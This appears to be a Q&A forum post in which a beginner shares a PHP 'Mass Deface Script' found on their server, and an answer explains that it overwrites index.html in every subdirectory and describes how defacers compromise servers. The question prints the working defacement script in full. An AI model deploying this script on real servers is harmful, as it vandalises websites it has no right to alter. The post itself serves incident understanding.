What is this script running?

5

I'm a beginner in the area and found this file inside my server:

<?php
/*
Script: Mass Deface Script
*/
echo "<center><textarea rows='10' cols='100'>";
$defaceurl = $_POST['massdefaceurl'];
$dir = $_POST['massdefacedir'];
echo $dir."\n";

if (is_dir($dir)) {
    if ($dh = opendir($dir)) {
        while (($file = readdir($dh)) !== false) {
                        if(filetype($dir.$file)=="dir"){
                                $newfile=$dir.$file."/index.html";
                                echo $newfile."\n";
                                if (!copy($defaceurl, $newfile)) {
                                        echo "failed to copy $file...\n";
                                }
                        }
        }
        closedir($dh);
    }
}
echo "</textarea></center>";
?>


<td align=right>Mass Defacement:</td><br>
</div>
<form action='<?php basename($_SERVER['PHP_SELF']); ?>' method='post'>
<div class="style31">
[+] Main Directory: <input type='text' style='width: 250px' value='<?php  echo getcwd() . "/"; ?>' name='massdefacedir'>
[+] Defacement Url: <input type='text' style='width: 250px' name='massdefaceurl'>
<input type='submit' name='execmassdeface' value='Execute'></div>
</form></td>

Can you help me understand what this file was running?

    
asked by anonymous 27.07.2015 / 15:19

1 answer

3

The script returns the current directory where this file is located, checks if it is manipulable, and creates a new index.html file

Mass Defacement

  

the defacers are not selective in their targets; in most cases they use automatic tools to find vulnerable servers, and automatically exploit them. The exploit automatically uploads backdoor to the compromised server which will provide, for example, shell access to the compromised server. The defacer can launch further attacks via the backdoor, such as trying to escalate privileges using local kernel exploits, or reporting the compromised server to a defacement archive. These backdoors are also sold on the black market, enabling buyers to, for example, turn a compromised server into a DDoS network, or use it as spam relay host.

They are fixed-target attacks, scan sites with vulnerabilities and exploit them, and can replace files, copy them, or even use the server for spam and DDoS.

In other words, your site is somehow vulnerable and has allowed third-party server access.

Mass Defacement

Mass Defacement

    
27.07.2015 / 15:54